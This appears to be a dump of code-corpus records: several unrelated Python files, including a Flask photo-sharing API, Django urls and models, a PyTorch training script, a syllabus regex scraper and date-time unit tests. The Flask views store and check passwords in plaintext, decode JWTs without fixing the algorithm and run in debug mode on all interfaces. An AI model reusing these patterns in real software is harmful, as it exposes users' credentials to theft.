lats\n\n\ndef _get_value(obj):\n \"\"\"Returns *obj*, unless *obj* is of type pvl.collections.Quantity, in\n which case, the .value component of the object is returned.\"\"\"\n if isinstance(obj, pvl.collections.Quantity):\n return obj.value\n else:\n return obj\n\n\ndef ground_to_image(cube_path, lon, lat):\n \"\"\"\n Returns a two-tuple of numpy arrays or a two-tuple of floats, where\n the first element of the tuple is the sample(s) and the second\n element are the lines(s) that represent the coordinate(s) of the\n input *lon* and *lat* in *cube_path*.\n\n If *lon* and *lat* are single numbers, then the returned two-tuple\n will have single elements. 
If they are Sequences, then the returned\n two-tuple will contain numpy arrays.\n\n Raises the same exceptions as point_info().\n\n Parameters\n ----------\n cube_path : os.PathLike\n Path to the input cube.\n\n lon: Number or Sequence of Numbers\n Longitude coordinate(s).\n\n lat: Number or Sequence of Numbers\n Latitude coordinate(s).\n\n \"\"\"\n res = point_info(cube_path, lon, lat, \"ground\")\n\n if isinstance(lon, (abc.Sequence, np.ndarray)):\n samples, lines = np.asarray([[r[\"Sample\"], r[\"Line\"]] for r in res]).T\n else:\n samples, lines = res[\"Sample\"], res[\"Line\"]\n\n return samples, lines\n\n\n","sub_path":"autocnet/spatial/isis.py","file_name":"isis.py","file_ext":"py","file_size_in_byte":11608,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"574658650","text":"\"\"\"\nFlask Documentation: http://flask.pocoo.org/docs/\nJinja2 Documentation: http://jinja.pocoo.org/2/documentation/\nWerkzeug Documentation: http://werkzeug.pocoo.org/documentation/\nThis file creates your application.\n\"\"\"\nfrom json import JSONEncoder\nfrom app import app, db, filefolder,login_manager,token_key\nfrom flask import render_template, request, url_for ,redirect,flash,jsonify, g, session\nfrom flask_login import login_user, logout_user, current_user, login_required\nfrom .forms import LoginForm, PostForm, RegisterForm\nfrom .models import Users, Posts, Follows, Likes\nfrom werkzeug.utils import secure_filename\nimport os\nimport datetime\nimport jwt\nfrom functools import wraps\npostfolder='static/images/'\n\n\n\n\n\ndef requires_auth(f):\n @wraps(f)\n def decorated(*args, **kwargs):\n auth = request.headers.get('Authorization', None)\n if not auth:\n return jsonify({'code': 'authorization_header_missing', 'description': 'Authorization header is expected'}), 401\n\n parts = auth.split()\n\n if parts[0].lower() != 'bearer':\n return jsonify({'code': 'invalid_header', 'description': 'Authorization header must start with Bearer'}), 401\n elif len(parts) == 1:\n return jsonify({'code': 'invalid_header', 'description': 'Token not found'}), 401\n elif len(parts) > 2:\n return jsonify({'code': 'invalid_header', 'description': 'Authorization header must be Bearer + \\s + token'}), 401\n\n token = parts[1]\n try:\n payload = jwt.decode(token, token_key)\n get_user = Users.query.filter_by(id=payload['user_id']).first()\n\n except jwt.ExpiredSignature:\n return jsonify({'code': 'token_expired', 'description': 'token is expired'}), 401\n except jwt.DecodeError:\n return jsonify({'code': 'token_invalid_signature', 'description': 'Token signature is invalid'}), 401\n\n g.current_user = user = get_user\n return f(*args, **kwargs)\n\n return decorated\n\n@app.route('/')\ndef index():\n \"\"\"Render website's initial page and let VueJS take over.\"\"\"\n return render_template('index.html')\n\n\n\n\n\n@app.route('/.txt')\ndef send_text_file(file_name):\n \"\"\"Send your static text file.\"\"\"\n file_dot_text = file_name + '.txt'\n return app.send_static_file(file_dot_text)\n\n@app.route(\"/api/users/register\",methods=[\"POST\"])\ndef register():\n form=RegisterForm()\n if request.method==\"POST\" and form.validate_on_submit():\n if form.password.data!=form.confirmpassword.data:\n return jsonify (errors=[{'error':['Passwords do not match']}])\n usernametest=Users.query.filter_by(username=form.username.data).first()\n emailtest=Users.query.filter_by(email=form.email.data).first()\n if usernametest is not None or emailtest is not None:\n if usernametest 
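`point_info` in isis.py accepts paired scalars, equal-length Sequences, or 1-D numpy arrays for x and y, normalizes them to coordinate lists, and unwraps the result again for scalar input (it also shifts by 0.5 pixel between PLIO and ISIS conventions). The input-dispatch logic on its own, as a runnable sketch with an illustrative helper name:

```python
from collections import abc
from numbers import Number
import numpy as np

def normalize_xy(x, y):
    """Mirror point_info's input handling: return (x_coords, y_coords,
    was_scalar) or raise the same exception types it uses."""
    if isinstance(x, abc.Sequence) and isinstance(y, abc.Sequence):
        if len(x) != len(y):
            raise IndexError("x and y sequences must have the same length")
        return x, y, False
    if isinstance(x, Number) and isinstance(y, Number):
        return [x], [y], True
    if isinstance(x, np.ndarray) and isinstance(y, np.ndarray):
        if x.ndim != 1 or y.ndim != 1 or x.shape != y.shape:
            raise IndexError("arrays must be 1-D and the same shape")
        return x, y, False
    raise TypeError(f"unsupported x/y types: {type(x)}, {type(y)}")

print(normalize_xy(10.5, 20.25))     # ([10.5], [20.25], True)
print(normalize_xy([1, 2], [3, 4]))  # ([1, 2], [3, 4], False)
```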
is not None:\n return jsonify(errors=[{'error':['Username not available. Please enter a different username']}])\n if emailtest is not None:\n return jsonify(errors=[{'error':['Email not available. Please use a different email address']}])\n else:\n fileupd=form.profile_photo.data\n filename=secure_filename(fileupd.filename)\n created=datetime.datetime.now()\n user=Users(form.fname.data,form.lname.data,form.username.data,form.email.data,form.password.data,form.location.data,form.biography.data,filename,created)\n db.session.add(user)\n db.session.commit()\n fileupd.save(os.path.join(filefolder,filename))\n usertest=Users.query.filter_by(username=form.username.data).first()\n if usertest is not None:\n return jsonify(response=[{'message':'Account created','username':usertest.username}])\n \n else:\n return jsonify(errors=[{'error':['Your account was not added. Please try again']}])\n error=[{'error':form_errors(form)}]\n return jsonify(errors=error)\n\n@login_manager.user_loader\ndef load_user(id):\n return Users.query.get(int(id))\n\n@app.route(\"/api/auth/login\", methods=[\"POST\"])\ndef login():\n #if session['userid']:\n # return jsonify(errors=[{'error':['You are already logged in.']}])\n form = LoginForm()\n if request.method == \"POST\" and form.validate_on_submit():\n # change this to actually validate the entire form submission\n # and not just one field\n username=form.username.data\n password=form.password.data\n \n user=Users.query.filter_by(username=username,password=password).first()\n # Get the username and password values from the form.\n if user is not None:\n payload = {'user_id' : user.id}\n token = jwt.encode(payload, token_key).decode('utf-8')\n session['userid'] = user.id;\n return jsonify(response=[{'message':'Log in successful','token': token, 'userid': user.id,'userphoto':postfolder+user.profile_photo}])\n flash('You were successfully logged in')\n else:\n return jsonify(errors=[{'error':['Password and user name does not match our records.']}])\n flash('Password and user name does not match our records')\n return jsonify(errors=[{'error':form_errors(form)}])\n\n\n@app.route(\"/api/auth/logout\",methods=[\"GET\"])\n@requires_auth\ndef logout():\n g.current_user=None\n if session['userid']:\n session.pop('userid')\n return jsonify(response=[{'message':'User successfully logged out.'}])\n\n \n@app.route(\"/api/users//posts\",methods=[\"GET\",\"POST\"])\n@requires_auth\ndef addpost(user_id):\n form=PostForm()\n if request.method==\"GET\":\n thisuser=''\n if user_id==0 or user_id==session['userid']:\n uid=session['userid']\n thisuser='Yes'\n \n else:\n uid=user_id\n thisuser='No'\n user=Users.query.filter_by(id=uid).first()\n if user is not None:\n userinfo={'id':user.id,'username':user.username,'fname':user.first_name,'lname':user.last_name,'location':user.location,'photo':postfolder+user.profile_photo,'bio':user.biography,'joined':user.joined_on.strftime(\"%B %Y\")}\n posts=Posts.query.filter_by(user_id=uid).all()\n follows=Follows.query.filter_by(user_id=uid).all()\n following=Follows.query.filter_by(follower_id=session['userid'], user_id=uid).first()\n isfollowing=''\n if following is None:\n isfollowing='No'\n else:\n isfollowing='Yes'\n return jsonify(response=[{'posts':[review_post(posts)],'numposts':len(posts),'follows':len(follows),'userinfo':userinfo,'current':thisuser,'following':isfollowing}])\n else:\n return jsonify(error={'error':'User does not exist'});\n if request.method==\"POST\" and form.validate_on_submit():\n image=form.photo.data\n 
filename=secure_filename(image.filename)\n created=datetime.datetime.now()\n post=Posts(session['userid'],filename,form.caption.data,created)\n db.session.add(post)\n db.session.commit()\n image.save(os.path.join(filefolder,filename))\n return jsonify(response=[{'message':'Post added successfully'}])\n return jsonify(errors=[{'error':form_errors(form)}])\n \n@app.route(\"/api/users//follow\",methods=[\"POST\"])\n@requires_auth\ndef follow(user_id):\n if request.method==\"POST\":\n follow=Follows(user_id,session['userid'])\n db.session.add(follow)\n db.session.commit()\n user=Users.query.filter_by(id=user_id).first()\n return jsonify(response={'message':'You are now following '+user.username})\n \n@app.route(\"/api/posts\",methods=[\"GET\"])\n@requires_auth\ndef getpost():\n posts=Posts.query.order_by(Posts.created_on.desc()).all()\n return jsonify(response=[{'posts':review_post(posts)}])\n \n@app.route(\"/api/posts//like\",methods=[\"POST\"])\n@requires_auth\ndef likepost(post_id):\n if request.method==\"POST\":\n like=Likes(session['userid'],post_id)\n db.session.add(like)\n db.session.commit()\n count=likes_counter(post_id)\n return jsonify(response=[{'message':'Post Liked'}])\n \n\ndef form_errors(form):\n error_messages = []\n \"\"\"Collects form errors\"\"\"\n for field, errors in form.errors.items():\n for error in errors:\n message = u\"Error in the %s field - %s\" % (\n getattr(form, field).label.text,\n error\n )\n error_messages.append(message)\n\n return error_messages\n\n\n\n@login_manager.user_loader\ndef load_user(id):\n return Users.query.get(int(id))\n\n\n\ndef review_post(posts):\n like_tester='';\n newposts=[]\n for i in range (0,len(posts)):\n user=Users.query.filter_by(id=posts[i].user_id).first();\n username=user.username;\n profilephoto=user.profile_photo;\n likevar=Likes.query.filter_by(post_id=posts[i].id,user_id=session['userid']).first()\n if likevar is None:\n like_tester='No'\n else:\n like_tester='Yes'\n wisdom={\n 'id':posts[i].id,\n 'user_id':posts[i].user_id,\n 'photo':postfolder+posts[i].photo,\n 'caption':posts[i].caption,\n 'created_on':posts[i].created_on.strftime(\"%d %b %Y\"),\n 'likes':likes_counter(posts[i].id),\n 'username':username,\n 'userphoto':postfolder+profilephoto,\n 'likebyuser':like_tester\n }\n newposts.append(wisdom)\n return newposts\n \ndef likes_counter(post_id):\n count=Likes.query.filter_by(post_id=post_id).all()\n return len(count)\n \n\n\n@app.after_request\ndef add_header(response):\n\n response.headers['X-UA-Compatible'] = 'IE=Edge,chrome=1'\n response.headers['Cache-Control'] = 'public, max-age=0'\n return response\n\n\n@app.errorhandler(404)\ndef page_not_found(error):\n \"\"\"Custom 404 page.\"\"\"\n return render_template('404.html'), 404\n\n\nif __name__ == '__main__':\n app.run(debug=True, host=\"0.0.0.0\", port=\"8080\")\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":10027,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"412521221","text":"\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom django.conf import settings\nfrom django.contrib.staticfiles.urls import static,staticfiles_urlpatterns\n\n\n# app_name = 'Route'\nviews = __import__(\"MVC Structure.Controller.views\")\nviews = views.Controller.views\n# from MVC_Structure.Controller.views import views\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('account/signup/',views.sign_up,name='signup'),\n path('account/login/', 
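views.py's `requires_auth` decorator splits the Authorization header into a Bearer token and verifies it with PyJWT before attaching the user to `g`. The header-parsing and decode step in isolation; note that PyJWT 2.x requires an explicit `algorithms` list on decode, and the secret below is a placeholder for the record's `token_key`:

```python
import jwt  # PyJWT

SECRET = "change-me"  # illustrative; the record reads this from app config

def parse_bearer(header_value: str) -> dict:
    """The core of requires_auth: validate 'Bearer <token>' and return
    the verified payload, raising on any malformed header."""
    if not header_value:
        raise ValueError("Authorization header is expected")
    parts = header_value.split()
    if len(parts) != 2 or parts[0].lower() != "bearer":
        raise ValueError("header must be 'Bearer <token>'")
    return jwt.decode(parts[1], SECRET, algorithms=["HS256"])

token = jwt.encode({"user_id": 42}, SECRET, algorithm="HS256")
print(parse_bearer(f"Bearer {token}"))  # {'user_id': 42}
```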
views.login_user, name='login'),\n path('account/logout/', views.logout_user, name='logout'),\n path('account/profile/',views.user_profile, name='profile'),\n path('shop/add/', views.add_to_cart, name=\"add\"),\n path('shop/remove/',views.remove_from_cart, name='remove'),\n path('shop/increase/', views.increase_cart, name='increase'),\n path('shop/decrease/', views.decrease_item, name='decrease'),\n path('shop/cart/',views.cart_view, name='cart'),\n path('payment/checkout/', views.checkout, name='checkout'),\n path('payment/pay/',views.payment, name=\"payment\"),\n path('payment/status/',views.complete, name='complete'),\n path('payment/purchase///', views.purchase, name='purchase'),\n path('payment/orders/', views.order_view, name='orders'),\n path('', views.Home.as_view(), name='home'),\n path('product/',views.ProductDetail.as_view(), name=\"product_detail\"),\n # path('',include('App_Shop.urls')),\n # path('shop/', include('App_Order.urls')),\n # path('payment/', include('App_Payment.urls')),\n]\n\nurlpatterns += staticfiles_urlpatterns()\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","sub_path":"E_Commerce_Platform/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"606409160","text":"import torch\nfrom torch import nn, optim\nfrom dataset.cyp450_1a2_data import cyp1a2_dataset\nfrom model.sgc import SGC_network\nfrom sklearn.metrics import r2_score\nfrom torch_geometric.data import DataLoader\n\npath=\"E:/ind content/bayes_labs_project/deepchem_data/Data_cyp450/data_cyp450_1a2.csv\"\ndataset=cyp1a2_dataset(path)\nprint(len(dataset))\nd_train=dataset[:int((len(dataset))*0.9)]\nd_test =dataset[int((len(dataset))*0.9):]\n\nclass RMSELoss(nn.Module):\n def __init__(self):\n super(RMSELoss,self).__init__()\n self.mse = nn.MSELoss()\n def forward(self, yhat, y):\n return torch.sqrt(self.mse(yhat, y))\n\n\nclass Train(object):\n def __init__(self, model, parameters, epochs, lr):\n # self.model = model(*parameters).to('cuda')\n self.model = model(**parameters)\n self.epoch = epochs\n self.criterion = RMSELoss()\n self.lr = lr\n # self.batch_size=batch_size\n def __call__(self, *input):\n train_loader = DataLoader(input[0], batch_size=32, shuffle=True)\n\n optimizer = optim.Adam(self.model.parameters(), lr=self.lr)\n for epoch in range(self.epoch):\n l = 0\n count = 0\n for data in train_loader:\n optimizer.zero_grad()\n # data = data.to('cuda')\n self.model = self.model.train()\n output = self.model(data)\n loss = self.criterion(output, data.y)\n loss.backward()\n optimizer.step()\n l += loss.item()\n count += 1\n if (epoch % 100 == 0):\n print(l / count)\n\n torch.save(self.model, 'E:/ind content/pycharm/office_pro/demo_project/Training/cyp450_1a2.pt')\n test_loader = DataLoader(input[1], batch_size=1, shuffle=False)\n y_hat = [0.0] * len(test_loader)\n y = [0.0] * len(test_loader)\n model = torch.load('E:/ind content/pycharm/office_pro/demo_project/Training/cyp450_1a2.pt')\n model = model.eval()\n count1 = 0\n for data in test_loader:\n out=model(data)\n # out = model(data.to('cuda'))\n y_hat[count1] += out.item()\n y[count1] += float(data.y.view(1))\n count1 += 1\n r_score = r2_score(y, y_hat)\n print(\"r_score:\",r_score)\n return r_score\n\nif __name__==\"__main__\":\n params = {'in_channel': 40,\n 'hid1': 128,\n 'hid2': 256,\n 'hid3': 128,\n 'lin1': 512,\n 'lin2': 128,\n 'out': 1,\n 'drop': 0.5,\n 'K': 2}\ntraining = 
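urls.py reaches its views via `__import__("MVC Structure.Controller.views")` and then attribute-walks down, a workaround for a package name that is not a valid Python identifier. `importlib.import_module` returns the leaf module directly and avoids the second step; a comparison using a stdlib dotted path so it runs anywhere:

```python
import importlib

# importlib returns the leaf module in one call:
decoder_mod = importlib.import_module("json.decoder")
print(decoder_mod.JSONDecoder)

# __import__ returns the top-level package, so the record's two-step
# attribute walk (views.Controller.views) is needed afterwards:
top = __import__("json.decoder")
print(top.decoder.JSONDecoder)
```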
Train(SGC_network, params, 1, 0.001)\ntraining(d_train,d_test)\n","sub_path":"ADMET/CYP450_isotopes_inhibitor/CYP450_1A2/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"284889201","text":"import os\nimport re\nimport textract\nimport util\n\n\nKEY_WORDS = [r'([A-Za-z]*\\s?homework[s]?)', '(quiz[zes]*)', \nr'[A-Za-z]*\\s?(test[s]?)', \\\n'(attendance)', '(participation)', '(project[s]?)', \"(response[s]?)\", \\\n '(presentation[s]?)', '(paper[s]?)', \"(performance[s]?)\", r\"(mid\\-?term)\", \\\n r\"(mid\\-?term [123])\\s\", r\"(midterm\\s?[sexampry]*)\", r\"(final\\s?[sexampry]*)\",\\\n r'[A-Za-z]*\\s?(asssignment[s]?)', r\"([A-Za-z0-9\\-]+)\\s([A-Za-z0-9\\-]{4,25})\", \\\n r\"([A-Za-z0-9\\-]{4,25})\"]\n\nPERCENTS = [\nr\"\\s?[\\:\\-\\,]?\\s(\\(?\\d+\\.?\\d*\\%\\)?)\",\nr\"\\s\\(.+\\)\\s?[\\:\\-\\,]?\\s(\\(?\\d+\\.?\\d*\\%\\)?)\",\nr\"\\s?[\\:\\-\\,\\=]?\\s(\\(?\\d+\\.?\\d* percent\\)?)\",\nr\"\\s\\(.+\\)\\s?[\\:\\-\\,\\=]?\\s(\\(?\\d+\\.?\\d* percent\\)?)\",\nr\"\\s?[\\:\\-\\,]?\\s(\\(?\\d+\\.?\\d*\\% of [A-Za-z]+ [A-Za-z]+\\)?)\",\nr\" counts for (\\d+\\.?\\d*\\% of [A-Za-z]+ [A-Za-z]+)\",\nr\" will count for (\\d+\\.?\\d*\\% of [A-Za-z]+ [A-Za-z]+)\",\n]\n\n\ndef get_grade_breakdown(text, year):\n '''\n Tries multiple regex to obtain grade breakdown from course syllabi.\n\n Inputs:\n text: (str) The text of a syllabus PDF.\n\n Returns:\n The grade breakdown in the syllabi for the course.\n '''\n\n grade_components = []\n done = \"\"\n\n # trying regex in text\n for word in KEY_WORDS:\n for percent in PERCENTS:\n results = re.findall(r\"\" + word + percent, text)\n if results:\n for result in results:\n results = results[0]\n check_this = result[-2] + result[-1]\n check_this = check_this.replace(\" \", \"\")\n if check_this not in done: # exclude duplicates\n done += \" \" + check_this\n grade_components.append(list(result))\n\n # building a string representing the breakdown\n breakdown_string = []\n done2 = \"\"\n for item in grade_components:\n percent = get_percent(item)\n percent += \"%\"\n s = ' '.join(item[:-1]) + \": \" + percent\n if s not in done2: # here excluding any duplicates\n done2 += \" \" + s\n breakdown_string.append(s)\n breakdown_string = \"; \".join(breakdown_string)\n if not breakdown_string:\n return \"No grade breakdown available.\"\n \n return breakdown_string\n\n\ndef get_percent(result):\n '''\n Gets the total percentage of a grade component, from a string.\n\n Inputs:\n result: (str) A regex result containing a percentage(s).\n\n Returns:\n The percetage(s) combined.\n '''\n\n percent = 0.0\n percent_list = re.findall(r\"\\d+\\.?\\d*\", result[-1])\n for i in percent_list:\n percent += float(i)\n\n return str(percent)","sub_path":"syllabi_scraping/grade_breakdown.py","file_name":"grade_breakdown.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"328951430","text":"from django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils import timezone\n\n\nclass Post(models.Model):\n\n h1 = models.CharField(max_length=200)\n title = models.CharField(max_length=200)\n url = models.SlugField()\n description = models.TextField(blank=True)\n text = models.TextField()\n image = models.ImageField(blank=True, upload_to='media')\n created_at = models.DateField(default=timezone.now)\n author = models.ForeignKey(User, 
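grade_breakdown.py pairs the KEY_WORDS and PERCENTS regexes to capture grade components, then its `get_percent` helper reduces each matched fragment by summing every numeric token it contains, so split captures like "10% ... 15%" combine into one total. That reduction as a standalone sketch:

```python
import re

def extract_percent(fragment: str) -> float:
    """Sum every numeric token in a percentage fragment, as the record's
    get_percent does with the last regex capture group."""
    return sum(float(tok) for tok in re.findall(r"\d+\.?\d*", fragment))

print(extract_percent("(25%)"))             # 25.0
print(extract_percent("10% of final 15%"))  # 25.0
```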
on_delete=models.CASCADE, blank=True)\n tag = models.CharField(max_length=200, blank=True)\n\n def __str__(self):\n return self.title\n\n\nclass Comment(models.Model):\n\n post = models.ForeignKey(Post, on_delete=models.CASCADE, related_name='comments')\n user = models.ForeignKey(User, on_delete=models.CASCADE, related_name='user_name')\n text = models.TextField()\n date = models.DateTimeField(default=timezone.now)\n\n class Meta:\n ordering = ['-date']\n\n def __str__(self):\n return self.text\n","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"506179760","text":"# tests for western time representation\n\n# Copyright (c) 2012-2020 Francesco Ricciardi\n#\n# All rights reserved.\n#\n# Redistribution and use in source and binary forms, with or without\n# modification, are permitted provided that the following conditions are met:\n#\n# * Redistributions of source code must retain the above copyright notice,\n# this list of conditions and the following disclaimer.\n# * Redistributions in binary form must reproduce the above copyright notice,\n# this list of conditions and the following disclaimer in the documentation\n# and/or other materials provided with the distribution.\n# * Neither the name(s) of the copyright holders nor the names of its\n# contributors may be used to endorse or promote products derived from this\n# software without specific prior written permission.\n#\n# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AS IS AND ANY EXPRESS OR\n# IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO\n# EVENT SHALL THE COPYRIGHT HOLDERS BE LIABLE FOR ANY DIRECT, INDIRECT,\n# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\n# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA,\n# OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF\n# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING\n# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n\n__author__ = \"Francesco Ricciardi \"\n\nfrom decimal import Decimal\nfrom fractions import Fraction\nfrom math import floor\nimport pickle\nimport pytest\n\nfrom datetime2.western import WesternTime\n\n\nINF = float(\"inf\")\nNAN = float(\"nan\")\n\nwestern_time_test_data = [\n # day_frac western as hours as minutes as seconds\n # numer denom h m s num denum num denum num denum\n # Boundary conditions around midnight\n # hour, minute, second and their halves second\n [\"0/1\", (0, 0, 0), \"0/1\", \"0/1\", \"0/1\"],\n [\"1/24\", (1, 0, 0), \"1/1\", \"60/1\", \"3600/1\"],\n [\"23/24\", (23, 0, 0), \"23/1\", \"1380/1\", \"82800/1\"],\n [\"1/48\", (0, 30, 0), \"1/2\", \"30/1\", \"1800/1\"],\n [\"47/48\", (23, 30, 0), \"47/2\", \"1410/1\", \"84600/1\"],\n [\"1/1440\", (0, 1, 0), \"1/60\", \"1/1\", \"60/1\"],\n [\"1439/1440\", (23, 59, 0), \"1439/60\", \"1439/1\", \"86340/1\"],\n [\"1/2880\", (0, 0, 30), \"1/120\", \"1/2\", \"30/1\"],\n [\"2879/2880\", (23, 59, 30), \"2879/120\", \"2879/2\", \"86370/1\"],\n [\"1/86400\", (0, 0, 1), \"1/3600\", \"1/60\", \"1/1\"],\n [\"86399/86400\", (23, 59, 59), \"86399/3600\", \"86399/60\", \"86399/1\"],\n [\"1/172800\", (0, 0, 0.5), \"1/7200\", \"1/120\", \"1/2\"],\n [\"172799/172800\", (23, 59, 59.5), 
\"172799/7200\", \"172799/120\", \"172799/2\"],\n # Boundary conditions around noon (e.g. for AM/PM switch)\n # hour, minute, second and their halves second\n [\"1/2\", (12, 0, 0), \"12/1\", \"720/1\", \"43200/1\"],\n [\"11/24\", (11, 0, 0), \"11/1\", \"660/1\", \"39600/1\"],\n [\"13/24\", (13, 0, 0), \"13/1\", \"780/1\", \"46800/1\"],\n [\"23/48\", (11, 30, 0), \"23/2\", \"690/1\", \"41400/1\"],\n [\"25/48\", (12, 30, 0), \"25/2\", \"750/1\", \"45000/1\"],\n [\"719/1440\", (11, 59, 0), \"719/60\", \"719/1\", \"43140/1\"],\n [\"721/1440\", (12, 1, 0), \"721/60\", \"721/1\", \"43260/1\"],\n [\"1439/2880\", (11, 59, 30), \"1439/120\", \"1439/2\", \"43170/1\"],\n [\"1441/2880\", (12, 0, 30), \"1441/120\", \"1441/2\", \"43230/1\"],\n [\"43199/86400\", (11, 59, 59), \"43199/3600\", \"43199/60\", \"43199/1\"],\n [\"43201/86400\", (12, 0, 1), \"43201/3600\", \"43201/60\", \"43201/1\"],\n [\"86399/172800\", (11, 59, 59.5), \"86399/7200\", \"86399/120\", \"86399/2\"],\n [\"86401/172800\", (12, 0, 0.5), \"86401/7200\", \"86401/120\", \"86401/2\"],\n # fractional part of day\n [\" 1/10\", (2, 24, 0), \"12/5\", \"144/1\", \"8640/1\"],\n [\"1/100\", (0, 14, 24), \"6/25\", \"72/5\", \"864/1\"],\n [\"1/1000\", (0, 1, \"132/5\"), \"3/125\", \"36/25\", \"432/5\"],\n [\"1/10000\", (0, 0, \"216/25\"), \"3/1250\", \"18/125\", \"216/25\"],\n [\"1/100000\", (0, 0, \"108/125\"), \"3/12500\", \"9/625\", \"108/125\"],\n [\"1/1000000\", (0, 0, \"54/625\"), \"3/125000\", \"9/6250\", \"54/625\"],\n [\n \"999999/1000000\",\n (23, 59, \"37446/625\"),\n \"2999997/125000\",\n \"8999991/6250\",\n \"53999946/625\",\n ],\n [\n \"99999/100000\",\n (23, 59, \"7392/125\"),\n \"299997/12500\",\n \"899991/625\",\n \"10799892/125\",\n ],\n [\"9999/10000\", (23, 59, \"1284/25\"), \"29997/1250\", \"179982/125\", \"2159784/25\"],\n [\"999/1000\", (23, 58, \"168/5\"), \"2997/125\", \"35964/25\", \"431568/5\"],\n [\"99/100\", (23, 45, 36), \"594/25\", \"7128/5\", \"85536/1\"],\n [\"9/10\", (21, 36, 0), \"108/5\", \"1296/1\", \"77760/1\"],\n]\n\nwestern_time_out_of_range_data = [\n # negative hour, minute or second\n [30, 10, -1],\n [30, -1, 20],\n [-1, 10, 20],\n # values above limits\n [30, 10, 60],\n [30, 10, 61],\n [30, 60, 20],\n [30, 61, 20],\n [24, 0, 0],\n [25, 0, 0],\n]\n\nwestern_time_microseconds = [\n # boundary conditions\n [\"0/1\", \"000000\"],\n [\"1/1000000\", \"000001\"],\n [\"1/2000000\", \"000000\"],\n [\"999999/1000000\", \"999999\"],\n [\"1999999/2000000\", \"999999\"],\n # a few not so random numbers\n [\"3/7\", \"428571\"],\n [\"12345/23456\", \"526304\"],\n]\n\nto_utc_test_data = [\n [\"-24\", Fraction(-24, 1)],\n [Decimal(\"-23.5\"), Fraction(-47, 2)],\n [-2, Fraction(-2, 1)],\n [-0.5, Fraction(-1, 2)],\n [Fraction(0, 1), Fraction(0, 1)],\n [Decimal(0.25), Fraction(1, 4)],\n [2, Fraction(2, 1)],\n [23.5, Fraction(47, 2)],\n [\"24\", Fraction(24, 1)],\n]\n\n\nclass TestWestern:\n def test_000_constructor(self):\n for test_row in western_time_test_data:\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime(hour, minute, second)\n assert (western.hour, western.minute, western.second) == (\n hour,\n minute,\n second,\n )\n\n def test_001_constructor_types_for_seconds(self):\n for integer_second in (3, \"3\"):\n western = WesternTime(5, 4, integer_second)\n assert western.to_seconds() == Fraction(18243, 1)\n for fractional_second in (1.25, Fraction(5, 4), \"1.25\", Decimal(\"1.25\"), \"5/4\"):\n western = WesternTime(5, 4, fractional_second)\n assert 
western.to_seconds() == Fraction(72965, 4)\n\n def test_010_constructor_in_hours(self):\n for test_row in western_time_test_data:\n in_hours = Fraction(test_row[2])\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime.in_hours(in_hours)\n assert (western.hour, western.minute, western.second) == (\n hour,\n minute,\n second,\n )\n\n def test_020_constructor_in_minutes(self):\n for test_row in western_time_test_data:\n in_minutes = Fraction(test_row[3])\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime.in_minutes(in_minutes)\n assert (western.hour, western.minute, western.second) == (\n hour,\n minute,\n second,\n )\n\n def test_030_constructor_in_seconds(self):\n for test_row in western_time_test_data:\n in_seconds = Fraction(test_row[4])\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime.in_seconds(in_seconds)\n assert (western.hour, western.minute, western.second) == (\n hour,\n minute,\n second,\n )\n\n def test_070_timezone_valid(self):\n for test_to_utc in to_utc_test_data:\n western1 = WesternTime(1, 2, 3, to_utc=test_to_utc[0])\n assert western1.to_utc == test_to_utc[1]\n western2 = WesternTime.in_hours(\"789/123\", to_utc=test_to_utc[0])\n assert western2.to_utc == test_to_utc[1]\n western2 = WesternTime.in_minutes(\"78901/123\", to_utc=test_to_utc[0])\n assert western2.to_utc == test_to_utc[1]\n western3 = WesternTime.in_seconds(\"789012/123\", to_utc=test_to_utc[0])\n assert western3.to_utc == test_to_utc[1]\n\n\n def test_090_constructor_day_frac(self):\n for test_row in western_time_test_data:\n day_frac = Fraction(test_row[0])\n hour = test_row[1][0]\n minute = test_row[1][1]\n second = Fraction(test_row[1][2])\n western = WesternTime.from_day_frac(day_frac)\n assert (western.hour, western.minute, western.second) == (\n hour,\n minute,\n second,\n )\n\n def test_100_invalid_parameter_types(self):\n # exception with none, two or four parameters\n with pytest.raises(TypeError):\n WesternTime()\n with pytest.raises(TypeError):\n WesternTime(1, 2)\n with pytest.raises(TypeError):\n WesternTime(1, 2, 3, 4)\n # exception with non-numeric types\n for invalid_par in (\"1\", (1,), [1], {1: 1}, (), [], {}, None):\n with 